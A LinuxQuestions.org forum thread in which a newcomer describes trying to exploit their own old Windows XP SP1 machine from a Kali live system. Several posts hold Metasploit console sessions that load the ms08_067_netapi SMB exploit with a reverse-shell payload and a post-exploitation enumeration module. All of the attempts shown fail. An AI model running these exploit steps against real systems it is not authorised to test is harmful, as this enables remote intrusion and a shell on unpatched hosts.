Tried kali to find XP system connected via Ethernet to the network
Linux - NewbieThis Linux forum is for members that are new to Linux.
Just starting out and have a question?
If it is not in the man pages or the how-to's this is the place!
Notices
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
I don't know about the complexity of this system. I presumed, I install kali, in this example, a live copy, login and have tools accessible to use, so I can try the xp system connection task. I thought this system was set to go from the get go, what somebody does with it or how, is another question. Considering it isn't a typical system. You can obviously use it just for some web browsing, which is nice. Other than what it, isn't a lite system for general tasks.
So I can't get this armitage working, what else can I do on there to do the task. There is no alternative, it would appear. I've used it more than what I tried in the first time around, where I simply copied the command in a clip, and it didn't work, and then gave up on it. I didn't fully appreciate the setup or task that is actuall required. It was simply a terminal window with one line of code, and I was trying to access the xp system on a wifi, with the firewall off, I think now. But it was all upto date.
I read this link on kali, a USB install persistence, so the hard drive like setup on a USB.
I tried installing it on the USB, nothing really happened or changed. Just loaded into the system, and tried to install the armitage, but that didn't work. E error all over again.
I then tried Installer, that then couldn't detect the storage. Unmount error what ever it was now.
So yeah, this may not work. Since the system works as Live. I wonder what else besides Nmap I can use with the security task with it. There are other tools. Is there anything lower than armitage or anything similar but with less function that I can try with the system.
I may only got as far as scanning, and using firefox again. To listen to the Matrix soundtrack.
Last edited by anon286; 07-16-2023 at 06:06 PM.
Reason: USB persistence USB
I did check out a tutorial video on the persistence option. I tried a program called Rufus, I am using a 8GB disk, so that didn't allow for any allocation of 4GB.
I only gathered from the past video, that the reason the armitage didn't install was because the download link was incorrect, default or edit the source.list didn't solve that.
My last option to get this persistence option working could be to allocate some space on the old drive I have which has windows 7 and Linux lite on it, and I have a third section to just load into a installed copy of the kali, and somehow get the armitage installed that way.
TCP port 139 and 135 appear to be open. So i couldn't try port 80 or something on one of the gather options, like screenshot of my desktop on my system.
I tried this option in 'gather'
msf6 > use post/windows/gather/enum_logged_on_users
msf6 post(windows/gather/enum_logged_on_users) > set RECENT true
RECENT => true
VERBOSE => false
msf6 post(windows/gather/enum_logged_on_users) > run -j
CURRENT => true
[-] Post failed: Msf::OptionValidateError One or more options failed to validate: SESSION.
At it's most basic, this should simply list the logged on user. I think.
Last edited by anon286; 07-22-2023 at 02:04 PM.
Reason: Post failed: Msf::OptionValidateError One or more options failed to validate: SESSION.
[-] IP:445 - Exploit failed: You must select a target. [*] Exploit completed, but no session was created.
And using the terminal just to load, I get these errors
msf6 > Info exploit/windows/smb/ms08_067_netapi
[-] Unknown command: Info
msf6 > exploit/windows/smb/ms08_067_netapi
[-] Unknown command: exploit/windows/smb/ms08_067_netapi
This is a module we can load. Do you want to use exploit/windows/smb/ms08_067_netapi? [y/N] y[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > use windows/smb/ms08_067_netapi[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > Set RHOST IP
[-] Unknown command: Set
msf6 exploit(windows/smb/ms08_067_netapi) >
Just using the terminal gives this error. And similar with Armitage, I tried that problem on the kali forums. See if it gets approved, so far few or no responses to topics do.
And questions about tools, definitely a no there.
Clearly the tasks are working, but no connection or session. Screenspy I tried that through armitage, should do a print screen of my system.
But no attack menu is listed, says attack list completed, and that is that, the virtual machine tutorial clip is different in my example.
Exploit targets:
=================
Id Name
-- ----
=> 0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal
4 Windows XP SP2 English (AlwaysOn NX)
5 Windows XP SP2 English (NX)
6 Windows XP SP3 English (AlwaysOn NX)
7 Windows XP SP3 English (NX)
8 Windows XP SP2 Arabic (NX)
9 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
10 Windows XP SP2 Chinese - Simplified (NX)
11 Windows XP SP2 Chinese - Traditional (NX)
12 Windows XP SP2 Czech (NX)
13 Windows XP SP2 Danish (NX)
14 Windows XP SP2 German (NX)
15 Windows XP SP2 Greek (NX)
16 Windows XP SP2 Spanish (NX)
17 Windows XP SP2 Finnish (NX)
18 Windows XP SP2 French (NX)
19 Windows XP SP2 Hebrew (NX)
20 Windows XP SP2 Hungarian (NX)
21 Windows XP SP2 Italian (NX)
22 Windows XP SP2 Japanese (NX)
23 Windows XP SP2 Korean (NX)
24 Windows XP SP2 Dutch (NX)
25 Windows XP SP2 Norwegian (NX)
26 Windows XP SP2 Polish (NX)
27 Windows XP SP2 Portuguese - Brazilian (NX)
28 Windows XP SP2 Portuguese (NX)
29 Windows XP SP2 Russian (NX)
30 Windows XP SP2 Swedish (NX)
31 Windows XP SP2 Turkish (NX)
32 Windows XP SP3 Arabic (NX)
33 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
34 Windows XP SP3 Chinese - Simplified (NX)
35 Windows XP SP3 Chinese - Traditional (NX)
36 Windows XP SP3 Czech (NX)
37 Windows XP SP3 Danish (NX)
38 Windows XP SP3 German (NX)
39 Windows XP SP3 Greek (NX)
40 Windows XP SP3 Spanish (NX)
41 Windows XP SP3 Finnish (NX)
42 Windows XP SP3 French (NX)
43 Windows XP SP3 Hebrew (NX)
44 Windows XP SP3 Hungarian (NX)
45 Windows XP SP3 Italian (NX)
46 Windows XP SP3 Japanese (NX)
47 Windows XP SP3 Korean (NX)
48 Windows XP SP3 Dutch (NX)
49 Windows XP SP3 Norwegian (NX)
50 Windows XP SP3 Polish (NX)
51 Windows XP SP3 Portuguese - Brazilian (NX)
52 Windows XP SP3 Portuguese (NX)
53 Windows XP SP3 Russian (NX)
54 Windows XP SP3 Swedish (NX)
55 Windows XP SP3 Turkish (NX)
56 Windows 2003 SP1 English (NO NX)
57 Windows 2003 SP1 English (NX)
58 Windows 2003 SP1 Japanese (NO NX)
59 Windows 2003 SP1 Spanish (NO NX)
60 Windows 2003 SP1 Spanish (NX)
61 Windows 2003 SP1 French (NO NX)
62 Windows 2003 SP1 French (NX)
63 Windows 2003 SP2 English (NO NX)
64 Windows 2003 SP2 English (NX)
65 Windows 2003 SP2 German (NO NX)
66 Windows 2003 SP2 German (NX)
67 Windows 2003 SP2 Portuguese (NX)
68 Windows 2003 SP2 Portuguese - Brazilian (NX)
69 Windows 2003 SP2 Spanish (NO NX)
70 Windows 2003 SP2 Spanish (NX)
71 Windows 2003 SP2 Japanese (NO NX)
72 Windows 2003 SP2 French (NO NX)
73 Windows 2003 SP2 French (NX)
74 Windows 2003 SP2 Chinese - Simplified (NX)
75 Windows 2003 SP2 Czech (NX)
76 Windows 2003 SP2 Dutch (NX)
77 Windows 2003 SP2 Hungarian (NX)
78 Windows 2003 SP2 Italian (NX)
79 Windows 2003 SP2 Russian (NX)
80 Windows 2003 SP2 Swedish (NX)
81 Windows 2003 SP2 Turkish (NX)
msf6 exploit(windows/smb/ms08_067_netapi) > set Target (0)
Target => (0)
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST IP
LHOST => IP
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
[-] IP:445 - Exploit failed: You must select a target.[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms08_067_netapi) >
I even tried changing the RPORT, but the tutorial uses 445.Default stuff.
Last edited by anon286; 07-23-2023 at 12:54 PM.
Reason: ms08_067 manual try via terminal error
Are you updating XP in any way, because you'd surely need to update your exploits; Microsoft isn't going to update XP anymore for you, why would Metasploit* update* those rewritable scripts? Maybe try Perl: http://www.porcupine.org/satan/
Last edited by jamison20000e; 07-30-2023 at 01:49 PM.
Reason: +2nd wildcard* now 3 :p
The system on the computer I have is a service pack 1 only setup. There are no updates for it. I only recently installed the driver for the Ethernet cable.
Only one website works in Internet Explorer six. So there is no up to date system, if that were the case, service pack 2 would be in an update, if updates were even still working for it.
That isn't really the goal. The goal was to try the exploit based off the example I saw in that video clip.
I almost got there with the task, but it has failed. My next task would be try the other XP system, now that can use a wifi adaper to connect to the network, and then I can see if the exploit of connecting to that works, and just try one of the exploits available. As the video showed.
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.